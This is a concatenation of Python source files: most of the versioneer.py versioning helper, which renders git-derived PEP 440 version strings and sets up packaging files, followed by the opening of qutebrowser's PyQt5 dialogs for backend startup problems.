cwd=root).split(\'\\n\')\n branches = [branch[2:] for branch in branches if branch[4:5] != \'(\']\n if \'master\' in branches:\n branch_name = \'master\'\n elif not branches:\n branch_name = None\n else:\n # Pick the first branch that is returned. Good or bad.\n branch_name = branches[0]\n\n pieces[\'branch\'] = branch_name\n\n # parse describe_out. 
It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]\n # TAG might have hyphens.\n git_describe = describe_out\n\n # look for -dirty suffix\n dirty = git_describe.endswith(""-dirty"")\n pieces[""dirty""] = dirty\n if dirty:\n git_describe = git_describe[:git_describe.rindex(""-dirty"")]\n\n # now we have TAG-NUM-gHEX or HEX\n\n if ""-"" in git_describe:\n # TAG-NUM-gHEX\n mo = re.search(r\'^(.+)-(\\d+)-g([0-9a-f]+)$\', git_describe)\n if not mo:\n # unparseable. Maybe git-describe is misbehaving?\n pieces[""error""] = (""unable to parse git-describe output: \'%s\'""\n % describe_out)\n return pieces\n\n # tag\n full_tag = mo.group(1)\n if not full_tag.startswith(tag_prefix):\n if verbose:\n fmt = ""tag \'%s\' doesn\'t start with prefix \'%s\'""\n print(fmt % (full_tag, tag_prefix))\n pieces[""error""] = (""tag \'%s\' doesn\'t start with prefix \'%s\'""\n % (full_tag, tag_prefix))\n return pieces\n pieces[""closest-tag""] = full_tag[len(tag_prefix):]\n\n # distance: number of commits since tag\n pieces[""distance""] = int(mo.group(2))\n\n # commit: short hex revision ID\n pieces[""short""] = mo.group(3)\n\n else:\n # HEX: no tags\n pieces[""closest-tag""] = None\n count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],\n cwd=root)\n pieces[""distance""] = int(count_out) # total number of commits\n\n return pieces\n\n\ndef do_vcs_install(manifest_in, versionfile_source, ipy):\n """"""Git-specific installation logic for Versioneer.\n\n For Git, this means creating/changing .gitattributes to mark _version.py\n for export-time keyword substitution.\n """"""\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n files = [manifest_in, versionfile_source]\n if ipy:\n files.append(ipy)\n try:\n me = __file__\n if me.endswith("".pyc"") or me.endswith("".pyo""):\n me = os.path.splitext(me)[0] + "".py""\n versioneer_file = os.path.relpath(me)\n except NameError:\n versioneer_file = ""versioneer.py""\n files.append(versioneer_file)\n present = False\n try:\n f = open("".gitattributes"", ""r"")\n for line in f.readlines():\n if line.strip().startswith(versionfile_source):\n if ""export-subst"" in line.strip().split()[1:]:\n present = True\n f.close()\n except EnvironmentError:\n pass\n if not present:\n f = open("".gitattributes"", ""a+"")\n f.write(""%s export-subst\\n"" % versionfile_source)\n f.close()\n files.append("".gitattributes"")\n run_command(GITS, [""add"", ""--""] + files)\n\n\ndef versions_from_parentdir(parentdir_prefix, root, verbose):\n """"""Try to determine the version from the parent directory name.\n\n Source tarballs conventionally unpack into a directory that includes\n both the project name and a version string.\n """"""\n dirname = os.path.basename(root)\n if not dirname.startswith(parentdir_prefix):\n if verbose:\n print(""guessing rootdir is \'%s\', but \'%s\' doesn\'t start with ""\n ""prefix \'%s\'"" % (root, dirname, parentdir_prefix))\n raise NotThisMethod(""rootdir doesn\'t start with parentdir_prefix"")\n return {""version"": dirname[len(parentdir_prefix):],\n ""full-revisionid"": None,\n ""dirty"": False, ""error"": None}\n\nSHORT_VERSION_PY = """"""\n# This file was generated by \'versioneer.py\' (0.15+dev) from\n# revision-control system data, or from the parent directory name of an\n# unpacked source archive. 
Distribution tarballs contain a pre-generated copy\n# of this file.\n\nimport json\nimport sys\n\nversion_json = \'\'\'\n%s\n\'\'\' # END VERSION_JSON\n\n\ndef get_versions():\n return json.loads(version_json)\n""""""\n\n\ndef versions_from_file(filename):\n """"""Try to determine the version from _version.py if present.""""""\n try:\n with open(filename) as f:\n contents = f.read()\n except EnvironmentError:\n raise NotThisMethod(""unable to read _version.py"")\n mo = re.search(r""version_json = \'\'\'\\n(.*)\'\'\' # END VERSION_JSON"",\n contents, re.M | re.S)\n if not mo:\n raise NotThisMethod(""no version_json in _version.py"")\n return json.loads(mo.group(1))\n\n\ndef write_to_version_file(filename, versions):\n """"""Write the given version number to the given _version.py file.""""""\n os.unlink(filename)\n contents = json.dumps(versions, sort_keys=True,\n indent=1, separators=("","", "": ""))\n with open(filename, ""w"") as f:\n f.write(SHORT_VERSION_PY % contents)\n\n print(""set %s to \'%s\'"" % (filename, versions[""version""]))\n\n# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.\ndefault_maint_branch_regexp = "".*([0-9]+\\.)+x$""\n\n\ndef plus_or_dot(pieces):\n """"""Return a + if we don\'t already have one, else return a .""""""\n if ""+"" in pieces.get(""closest-tag"", """"):\n return "".""\n return ""+""\n\n\ndef render_pep440(pieces):\n """"""Build up version string, with post-release ""local version identifier"".\n\n Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you\n get a tagged build and then dirty it, you\'ll get TAG+0.gHEX.dirty\n\n Exceptions:\n 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += plus_or_dot(pieces)\n rendered += ""%d.g%s"" % (pieces[""distance""], pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n else:\n # exception #1\n rendered = ""0+untagged.%d.g%s"" % (pieces[""distance""],\n pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n return rendered\n\n\ndef render_pep440_pre(pieces):\n """"""TAG[.post.devDISTANCE] -- No -dirty.\n\n Exceptions:\n 1: no tags. 0.post.devDISTANCE\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post.dev%d"" % pieces[""distance""]\n else:\n # exception #1\n rendered = ""0.post.dev%d"" % pieces[""distance""]\n return rendered\n\n\ndef render_pep440_post(pieces):\n """"""TAG[.postDISTANCE[.dev0]+gHEX] .\n\n The "".dev0"" means dirty. Note that .dev0 sorts backwards\n (a dirty tree will appear ""older"" than the corresponding clean one),\n but you shouldn\'t be releasing software with -dirty anyways.\n\n Exceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += plus_or_dot(pieces)\n rendered += ""g%s"" % pieces[""short""]\n else:\n # exception #1\n rendered = ""0.post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += ""+g%s"" % pieces[""short""]\n return rendered
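\n\n# Illustrative sketch (added for clarity; not in the original versioneer\n# source): given pieces like {""closest-tag"": ""1.2"", ""distance"": 3,\n# ""short"": ""abc1234"", ""dirty"": True}, the renderers here produce:\n# render_pep440 -> \'1.2+3.gabc1234.dirty\'\n# render_pep440_pre -> \'1.2.post.dev3\'\n# render_pep440_post -> \'1.2.post3.dev0+gabc1234\'\n# render_pep440_old (below) -> \'1.2.post3.dev0\'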
\n\ndef render_pep440_old(pieces):\n """"""TAG[.postDISTANCE[.dev0]] .\n\n The "".dev0"" means dirty.\n\n Exceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n else:\n # exception #1\n rendered = ""0.post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n return rendered\n\n\ndef render_git_describe(pieces):\n """"""TAG[-DISTANCE-gHEX][-dirty].\n\n Like \'git describe --tags --dirty --always\'.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef render_git_describe_long(pieces):\n """"""TAG-DISTANCE-gHEX[-dirty].\n\n Like \'git describe --tags --dirty --always --long\'.\n The distance/hash is unconditional.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef add_one_to_version(version_string, number_index_to_increment=-1):\n """"""\n Add one to a version string at the given numeric indices.\n\n >>> add_one_to_version(\'v1.2.3\')\n \'v1.2.4\'\n\n """"""\n # Break up the tag by number groups (preserving multi-digit\n # numbers as multidigit)\n parts = re.split(""([0-9]+)"", version_string)\n\n digit_parts = [(i, part) for i, part in enumerate(parts)\n if part.isdigit()]\n\n # Deal with negative indexing.\n increment_at_index = ((number_index_to_increment + len(digit_parts))\n % len(digit_parts))\n for n_seen, (i, part) in enumerate(digit_parts):\n if n_seen == increment_at_index:\n parts[i] = str(int(part) + 1)\n elif n_seen > increment_at_index:\n parts[i] = \'0\'\n return \'\'.join(parts)
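\n\n# Illustrative sketch (added for clarity; not in the original versioneer\n# source): incrementing an inner number group zeroes out the groups\n# after it:\n# >>> add_one_to_version(\'v1.2.3\', number_index_to_increment=1)\n# \'v1.3.0\'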
\n\ndef render_pep440_branch_based(pieces):\n # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is\n # included for dirty.\n\n # exceptions:\n # 1: no tags. 0.0.0.devDISTANCE[+gHEX]\n\n replacements = {\' \': \'.\', \'(\': \'\', \')\': \'\'}\n # \'branch\' may be None (e.g. a detached HEAD with no containing branch).\n branch_name = pieces.get(\'branch\') or \'\'\n for old, new in replacements.items():\n branch_name = branch_name.replace(old, new)\n master = branch_name == \'master\'\n maint = re.match(default_maint_branch_regexp,\n branch_name or \'\')\n\n # If we are on a tag, just pep440-pre it.\n if pieces[""closest-tag""] and not (pieces[""distance""] or\n pieces[""dirty""]):\n rendered = pieces[""closest-tag""]\n else:\n # Put a default closest-tag in.\n if not pieces[""closest-tag""]:\n pieces[""closest-tag""] = \'0.0.0\'\n\n if pieces[""distance""] or pieces[""dirty""]:\n if maint:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post%d"" % pieces[""distance""]\n else:\n rendered = add_one_to_version(pieces[""closest-tag""])\n if pieces[""distance""]:\n rendered += "".dev%d"" % pieces[""distance""]\n\n suffix = []\n # Put the branch name in if it isn\'t master nor a\n # maintenance branch.\n if not (master or maint):\n suffix.append(\'%s\' % (branch_name or \'unknown_branch\'))\n\n if pieces[""dirty""]:\n suffix.append(\'g%s\' % pieces[""short""])\n rendered += \'+%s\' % \'\'.join(suffix)\n else:\n rendered = pieces[""closest-tag""]\n return rendered\n\n\nSTYLES = {\'default\': render_pep440,\n \'pep440\': render_pep440,\n \'pep440-pre\': render_pep440_pre,\n \'pep440-post\': render_pep440_post,\n \'pep440-old\': render_pep440_old,\n \'git-describe\': render_git_describe,\n \'git-describe-long\': render_git_describe_long,\n \'pep440-branch-based\': render_pep440_branch_based,\n }\n\n\ndef render(pieces, style):\n """"""Render the given version pieces into the requested style.""""""\n if pieces[""error""]:\n return {""version"": ""unknown"",\n ""full-revisionid"": pieces.get(""long""),\n ""dirty"": None,\n ""error"": pieces[""error""]}\n\n if not style:\n style = \'default\'\n\n renderer = STYLES.get(style)\n\n if not renderer:\n raise ValueError(""unknown style \'%s\'"" % style)\n\n rendered = renderer(pieces)\n\n return {""version"": rendered, ""full-revisionid"": pieces[""long""],\n ""dirty"": pieces[""dirty""], ""error"": None}\n\n\nclass VersioneerBadRootError(Exception):\n\n """"""The project root directory is unknown or missing key files.""""""\n\n\ndef get_versions(verbose=False):\n """"""Get the project version from whatever source is available.\n\n Returns dict with two keys: \'version\' and \'full\'.\n """"""\n if ""versioneer"" in sys.modules:\n # see the discussion in cmdclass.py:get_cmdclass()\n del sys.modules[""versioneer""]\n\n root = get_root()\n cfg = get_config_from_root(root)\n\n assert cfg.VCS is not None, ""please set [versioneer]VCS= in setup.cfg""\n handlers = HANDLERS.get(cfg.VCS)\n assert handlers, ""unrecognized VCS \'%s\'"" % cfg.VCS\n verbose = verbose or cfg.verbose\n assert cfg.versionfile_source is not None, \\\n ""please set versioneer.versionfile_source""\n assert cfg.tag_prefix is not None, ""please set versioneer.tag_prefix""\n\n versionfile_abs = os.path.join(root, cfg.versionfile_source)\n\n # extract version from first of: _version.py, VCS command (e.g. \'git\n # describe\'), parentdir.
This is meant to work for developers using a\n # source checkout, for users of a tarball created by \'setup.py sdist\',\n # and for users of a tarball/zipball created by \'git archive\' or github\'s\n # download-from-tag feature or the equivalent in other VCSes.\n\n get_keywords_f = handlers.get(""get_keywords"")\n from_keywords_f = handlers.get(""keywords"")\n if get_keywords_f and from_keywords_f:\n try:\n keywords = get_keywords_f(versionfile_abs)\n ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)\n if verbose:\n print(""got version from expanded keyword %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n try:\n ver = versions_from_file(versionfile_abs)\n if verbose:\n print(""got version from file %s %s"" % (versionfile_abs, ver))\n return ver\n except NotThisMethod:\n pass\n\n from_vcs_f = handlers.get(""pieces_from_vcs"")\n if from_vcs_f:\n try:\n pieces = from_vcs_f(cfg.tag_prefix, root, verbose)\n ver = render(pieces, cfg.style)\n if verbose:\n print(""got version from VCS %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n try:\n if cfg.parentdir_prefix:\n ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)\n if verbose:\n print(""got version from parentdir %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n if verbose:\n print(""unable to compute version"")\n\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None, ""error"": ""unable to compute version""}\n\n\ndef get_version():\n """"""Get the short version string for this project.""""""\n return get_versions()[""version""]\n\n\ndef get_cmdclass():\n """"""Get the custom setuptools/distutils subclasses used by Versioneer.""""""\n if ""versioneer"" in sys.modules:\n del sys.modules[""versioneer""]\n # this fixes the ""python setup.py develop"" case (also \'install\' and\n # \'easy_install .\'), in which subdependencies of the main project are\n # built (using setup.py bdist_egg) in the same python process. Assume\n # a main project A and a dependency B, which use different versions\n # of Versioneer. A\'s setup.py imports A\'s Versioneer, leaving it in\n # sys.modules by the time B\'s setup.py is executed, causing B to run\n # with the wrong versioneer. Setuptools wraps the sub-dep builds in a\n # sandbox that restores sys.modules to it\'s pre-build state, so the\n # parent is protected against the child\'s ""import versioneer"". 
By\n # removing ourselves from sys.modules here, before the child build\n # happens, we protect the child from the parent\'s versioneer too.\n # Also see https://github.com/warner/python-versioneer/issues/52\n\n cmds = {}\n\n # we add ""version"" to both distutils and setuptools\n from distutils.core import Command\n\n class cmd_version(Command):\n description = ""report generated version string""\n user_options = []\n boolean_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n vers = get_versions(verbose=True)\n print(""Version: %s"" % vers[""version""])\n print("" full-revisionid: %s"" % vers.get(""full-revisionid""))\n print("" dirty: %s"" % vers.get(""dirty""))\n if vers[""error""]:\n print("" error: %s"" % vers[""error""])\n cmds[""version""] = cmd_version\n\n # we override ""build_py"" in both distutils and setuptools\n #\n # most invocation pathways end up running build_py:\n # distutils/build -> build_py\n # distutils/install -> distutils/build ->..\n # setuptools/bdist_wheel -> distutils/install ->..\n # setuptools/bdist_egg -> distutils/install_lib -> build_py\n # setuptools/install -> bdist_egg ->..\n # setuptools/develop -> ?\n\n # we override different ""build_py"" commands for both environments\n if ""setuptools"" in sys.modules:\n from setuptools.command.build_py import build_py as _build_py\n else:\n from distutils.command.build_py import build_py as _build_py\n\n class cmd_build_py(_build_py):\n def run(self):\n root = get_root()\n cfg = get_config_from_root(root)\n versions = get_versions()\n _build_py.run(self)\n # now locate _version.py in the new build/ directory and replace\n # it with an updated value\n if cfg.versionfile_build:\n target_versionfile = os.path.join(self.build_lib,\n cfg.versionfile_build)\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile, versions)\n cmds[""build_py""] = cmd_build_py\n\n if ""cx_Freeze"" in sys.modules: # cx_freeze enabled?\n from cx_Freeze.dist import build_exe as _build_exe\n\n class cmd_build_exe(_build_exe):\n def run(self):\n root = get_root()\n cfg = get_config_from_root(root)\n versions = get_versions()\n target_versionfile = cfg.versionfile_source\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile, versions)\n\n _build_exe.run(self)\n os.unlink(target_versionfile)\n with open(cfg.versionfile_source, ""w"") as f:\n LONG = LONG_VERSION_PY[cfg.VCS]\n f.write(LONG %\n {""DOLLAR"": ""$"",\n ""STYLE"": cfg.style,\n ""TAG_PREFIX"": cfg.tag_prefix,\n ""PARENTDIR_PREFIX"": cfg.parentdir_prefix,\n ""VERSIONFILE_SOURCE"": cfg.versionfile_source,\n })\n cmds[""build_exe""] = cmd_build_exe\n del cmds[""build_py""]\n\n # we override different ""sdist"" commands for both environments\n if ""setuptools"" in sys.modules:\n from setuptools.command.sdist import sdist as _sdist\n else:\n from distutils.command.sdist import sdist as _sdist\n\n class cmd_sdist(_sdist):\n def run(self):\n versions = get_versions()\n self._versioneer_generated_versions = versions\n # unless we update this, the command will keep using the old\n # version\n self.distribution.metadata.version = versions[""version""]\n return _sdist.run(self)\n\n def make_release_tree(self, base_dir, files):\n root = get_root()\n cfg = get_config_from_root(root)\n _sdist.make_release_tree(self, base_dir, files)\n # now locate _version.py in the new base_dir directory\n # (remembering that it may be a hardlink) and replace it with an\n # updated 
value\n target_versionfile = os.path.join(base_dir, cfg.versionfile_source)\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile,\n self._versioneer_generated_versions)\n cmds[""sdist""] = cmd_sdist\n\n return cmds\n\n\nCONFIG_ERROR = """"""\nsetup.cfg is missing the necessary Versioneer configuration. You need\na section like:\n\n [versioneer]\n VCS = git\n style = pep440\n versionfile_source = src/myproject/_version.py\n versionfile_build = myproject/_version.py\n tag_prefix =\n parentdir_prefix = myproject-\n\nYou will also need to edit your setup.py to use the results:\n\n import versioneer\n setup(version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(), ...)\n\nPlease read the docstring in ./versioneer.py for configuration instructions,\nedit setup.cfg, and re-run the installer or \'python versioneer.py setup\'.\n""""""\n\nSAMPLE_CONFIG = """"""\n# See the docstring in versioneer.py for instructions. Note that you must\n# re-run \'versioneer.py setup\' after changing this section, and commit the\n# resulting files.\n\n[versioneer]\n#VCS = git\n#style = pep440\n#versionfile_source =\n#versionfile_build =\n#tag_prefix =\n#parentdir_prefix =\n\n""""""\n\nINIT_PY_SNIPPET = """"""\nfrom ._version import get_versions\n__version__ = get_versions()[\'version\']\ndel get_versions\n""""""\n\n\ndef do_setup():\n """"""Main VCS-independent setup function for installing Versioneer.""""""\n root = get_root()\n try:\n cfg = get_config_from_root(root)\n except (EnvironmentError, configparser.NoSectionError,\n configparser.NoOptionError) as e:\n if isinstance(e, (EnvironmentError, configparser.NoSectionError)):\n print(""Adding sample versioneer config to setup.cfg"",\n file=sys.stderr)\n with open(os.path.join(root, ""setup.cfg""), ""a"") as f:\n f.write(SAMPLE_CONFIG)\n print(CONFIG_ERROR, file=sys.stderr)\n return 1\n\n print("" creating %s"" % cfg.versionfile_source)\n with open(cfg.versionfile_source, ""w"") as f:\n LONG = LONG_VERSION_PY[cfg.VCS]\n f.write(LONG % {""DOLLAR"": ""$"",\n ""STYLE"": cfg.style,\n ""TAG_PREFIX"": cfg.tag_prefix,\n ""PARENTDIR_PREFIX"": cfg.parentdir_prefix,\n ""VERSIONFILE_SOURCE"": cfg.versionfile_source,\n })\n\n ipy = os.path.join(os.path.dirname(cfg.versionfile_source),\n ""__init__.py"")\n if os.path.exists(ipy):\n try:\n with open(ipy, ""r"") as f:\n old = f.read()\n except EnvironmentError:\n old = """"\n if INIT_PY_SNIPPET not in old:\n print("" appending to %s"" % ipy)\n with open(ipy, ""a"") as f:\n f.write(INIT_PY_SNIPPET)\n else:\n print("" %s unmodified"" % ipy)\n else:\n print("" %s doesn\'t exist, ok"" % ipy)\n ipy = None\n\n # Make sure both the top-level ""versioneer.py"" and versionfile_source\n # (PKG/_version.py, used by runtime code) are in MANIFEST.in, so\n # they\'ll be copied into source distributions. Pip won\'t be able to\n # install the package without this.\n manifest_in = os.path.join(root, ""MANIFEST.in"")\n simple_includes = set()\n try:\n with open(manifest_in, ""r"") as f:\n for line in f:\n if line.startswith(""include ""):\n for include in line.split()[1:]:\n simple_includes.add(include)\n except EnvironmentError:\n pass\n # That doesn\'t cover everything MANIFEST.in can do\n # (http://docs.python.org/2/distutils/sourcedist.html#commands), so\n # it might give some false negatives. 
Appending redundant \'include\'\n # lines is safe, though.\n if ""versioneer.py"" not in simple_includes:\n print("" appending \'versioneer.py\' to MANIFEST.in"")\n with open(manifest_in, ""a"") as f:\n f.write(""include versioneer.py\\n"")\n else:\n print("" \'versioneer.py\' already in MANIFEST.in"")\n if cfg.versionfile_source not in simple_includes:\n print("" appending versionfile_source (\'%s\') to MANIFEST.in"" %\n cfg.versionfile_source)\n with open(manifest_in, ""a"") as f:\n f.write(""include %s\\n"" % cfg.versionfile_source)\n else:\n print("" versionfile_source already in MANIFEST.in"")\n\n # Make VCS-specific changes. For git, this means creating/changing\n # .gitattributes to mark _version.py for export-time keyword\n # substitution.\n do_vcs_install(manifest_in, cfg.versionfile_source, ipy)\n return 0\n\n\ndef scan_setup_py():\n """"""Validate the contents of setup.py against Versioneer\'s expectations.""""""\n found = set()\n setters = False\n errors = 0\n with open(""setup.py"", ""r"") as f:\n for line in f.readlines():\n if ""import versioneer"" in line:\n found.add(""import"")\n if ""versioneer.get_cmdclass()"" in line:\n found.add(""cmdclass"")\n if ""versioneer.get_version()"" in line:\n found.add(""get_version"")\n if ""versioneer.VCS"" in line:\n setters = True\n if ""versioneer.versionfile_source"" in line:\n setters = True\n if len(found) != 3:\n print("""")\n print(""Your setup.py appears to be missing some important items"")\n print(""(but I might be wrong). Please make sure it has something"")\n print(""roughly like the following:"")\n print("""")\n print("" import versioneer"")\n print("" setup( version=versioneer.get_version(),"")\n print("" cmdclass=versioneer.get_cmdclass(), ...)"")\n print("""")\n errors += 1\n if setters:\n print(""You should remove lines like \'versioneer.VCS = \' and"")\n print(""\'versioneer.versionfile_source = \' . This configuration"")\n print(""now lives in setup.cfg, and should be removed from setup.py"")\n print("""")\n errors += 1\n return errors\n\nif __name__ == ""__main__"":\n cmd = sys.argv[1]\n if cmd == ""setup"":\n errors = do_setup()\n errors += scan_setup_py()\n if errors:\n sys.exit(1)\n', '# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com\n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. 
If not, see .\n\n""""""Dialogs shown when there was a problem with a backend choice.""""""\n\nimport os\nimport sys\nimport functools\nimport html\nimport enum\nimport shutil\nimport argparse\nimport dataclasses\nfrom typing import Any, List, Sequence, Tuple, Optional\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel,\n QMessageBox, QWidget)\nfrom PyQt5.QtNetwork import QSslSocket\n\nfrom qutebrowser.config import config, configfiles\nfrom qutebrowser.utils import (usertypes, version, qtutils, log, utils,\n standarddir)\nfrom qutebrowser.misc import objects, msgbox, savemanager, quitter\n\n\nclass _Result(enum.IntEnum):\n\n """"""The result code returned by the backend problem dialog.""""""\n\n quit = QDialog.Accepted + 1\n restart = QDialog.Accepted + 2\n restart_webkit = QDialog.Accepted + 3\n restart_webengine = QDialog.Accepted + 4\n\n\n@dataclasses.dataclass\nclass _Button:\n\n """"""A button passed to BackendProblemDialog.""""""\n\n text: str\n setting: str\n value: Any\n default: bool = False\n\n\ndef _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]:\n """"""Get the other backend enum/setting for a given backend.""""""\n other_backend = {\n usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine,\n usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit,\n }[backend]\n other_setting = other_backend.name.lower()[2:]\n return (other_backend, other_setting)\n\n\ndef _error_text(because: str, text: str, backend: usertypes.Backend) -> str:\n """"""Get an error text for the given information.""""""\n other_backend, other_setting = _other_backend(backend)\n if other_backend == usertypes.Backend.QtWebKit:\n warning = (""Note that QtWebKit hasn\'t been updated since ""\n ""July 2017 (including security updates)."")\n suffix = "" (not recommended)""\n else:\n warning = """"\n suffix = """"\n return (""Failed to start with the {backend} backend!""\n ""
\n ""qutebrowser tried to start with the {backend} backend but ""\n ""failed because {because}. ""\n ""{text}""\n ""Forcing the {other_backend.name} backend{suffix}: ""\n ""This forces usage of the {other_backend.name} backend by ""\n ""setting the backend = \'{other_setting}\' option ""\n ""(if you have a config.py file, you\'ll need to set ""\n ""this manually). {warning}
    "".format(\n backend=backend.name, because=because, text=text,\n other_backend=other_backend, other_setting=other_setting,\n warning=warning, suffix=suffix))\n\n\nclass _Dialog(QDialog):\n\n """"""A dialog which gets shown if there are issues with the backend.""""""\n\n def __init__(self, *, because: str,\n text: str,\n backend: usertypes.Backend,\n buttons: Sequence[_Button] = None,\n parent: QWidget = None) -> None:\n super().__init__(parent)\n vbox = QVBoxLayout(self)\n\n other_backend, other_setting = _other_backend(backend)\n text = _error_text(because, text, backend)\n\n label = QLabel(text)\n label.setWordWrap(True)\n label.setTextFormat(Qt.RichText)\n vbox.addWidget(label)\n\n hbox = QHBoxLayout()\n buttons = [] if buttons is None else buttons\n\n quit_button = QPushButton(""Quit"")\n quit_button.clicked.connect(lambda: self.done(_Result.quit))\n hbox.addWidget(quit_button)\n\n backend_text = ""Force {} backend"".format(other_backend.name)\n if other_backend == usertypes.Backend.QtWebKit:\n backend_text += \' (not recommended)\'\n backend_button = QPushButton(backend_text)\n backend_button.clicked.connect(functools.partial(\n self._change_setting, \'backend\', other_setting))\n hbox.addWidget(backend_button)\n\n for button in buttons:\n btn = QPushButton(button.text)\n btn.setDefault(button.default)\n btn.clicked.connect(functools.partial(\n self._change_setting, button.setting, button.value))\n hbox.addWidget(btn)\n\n vbox.addLayout(hbox)\n\n def _change_setting(self, setting: str, value: str) -> None:\n """"""Change the given setting and restart.""""""\n config.instance.set_obj(setting, value, save_yaml=True)\n\n if setting == \'backend\' and value == \'webkit\':\n self.done(_Result.restart_webkit)\n elif setting == \'backend\' and value == \'webengine\':\n self.done(_Result.restart_webengine)\n else:\n self.done(_Result.restart)\n\n\n@dataclasses.dataclass\nclass _BackendImports:\n\n """"""Whether backend modules could be imported.""""""\n\n webkit_error: Optional[str] = None\n webengine_error: Optional[str] = None\n\n\nclass _BackendProblemChecker:\n\n """"""Check for various backend-specific issues.""""""\n\n def __init__(self, *,\n no_err_windows: bool,\n save_manager: savemanager.SaveManager) -> None:\n self._save_manager = save_manager\n self._no_err_windows = no_err_windows\n\n def _show_dialog(self, *args: Any, **kwargs: Any) -> None:\n """"""Show a dialog for a backend problem.""""""\n if self._no_err_windows:\n text = _error_text(*args, **kwargs)\n print(text, file=sys.stderr)\n sys.exit(usertypes.Exit.err_init)\n\n dialog = _Dialog(*args, **kwargs)\n\n status = dialog.exec()\n self._save_manager.save_all(is_exit=True)\n\n if status in [_Result.quit, QDialog.Rejected]:\n pass\n elif status == _Result.restart_webkit:\n quitter.instance.restart(override_args={\'backend\': \'webkit\'})\n elif status == _Result.restart_webengine:\n quitter.instance.restart(override_args={\'backend\': \'webengine\'})\n elif status == _Result.restart:\n quitter.instance.restart()\n else:\n raise utils.Unreachable(status)\n\n sys.exit(usertypes.Exit.err_init)\n\n def _nvidia_shader_workaround(self) -> None:\n """"""Work around QOpenGLShaderProgram issues.\n\n See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826\n """"""\n self._assert_backend(usertypes.Backend.QtWebEngine)\n utils.libgl_workaround()\n\n def _xwayland_options(self) -> Tuple[str, List[_Button]]:\n """"""Get buttons/text for a possible XWayland solution.""""""\n buttons = []\n text = ""
You can work around this in one of the following ways:""\n\n if \'DISPLAY\' in os.environ:\n # XWayland is available, but QT_QPA_PLATFORM=wayland is set\n buttons.append(\n _Button(""Force XWayland"", \'qt.force_platform\', \'xcb\'))\n text += (""Force Qt to use XWayland: ""\n ""This allows you to use the newer QtWebEngine backend ""\n ""(based on Chromium). ""\n ""This sets the qt.force_platform = \'xcb\' option ""\n ""(if you have a config.py file, you\'ll need to ""\n ""set this manually)."")\n else:\n text += (""Set up XWayland: ""\n ""
